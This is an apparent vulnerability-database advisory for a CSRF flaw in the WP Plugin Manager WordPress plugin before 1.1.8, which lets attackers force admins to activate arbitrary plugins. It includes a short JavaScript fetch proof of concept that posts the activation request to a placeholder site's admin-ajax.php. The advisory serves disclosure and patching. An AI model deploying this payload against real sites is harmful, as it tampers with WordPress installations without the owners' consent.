Lucene search

K
wpvulndbWpvulndbWPVDB-ID:A956F1CD-FCE4-4235-B1AF-4B7675A60CA2
HistoryFeb 28, 2023 - 12:00 a.m.

WP Plugin Manager < 1.1.8 - Arbitrary Plugin Activation via CSRF

2023-02-2800:00:00
wpscan.com
17
wordpress
plugin
csrf
arbitrary activation
security vulnerability

0.001 Low

EPSS

Percentile

29.7%

The plugin does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack

PoC

fetch(‘https://example.com/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=wppluginmanager_ajax_plugin_activation&location;=woocommerce/woocommerce.php’, redirect: ‘follow’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error));

CPENameOperatorVersion
wp-plugin-managerlt1.1.8

0.001 Low

EPSS

Percentile

29.7%

Related for WPVDB-ID:A956F1CD-FCE4-4235-B1AF-4B7675A60CA2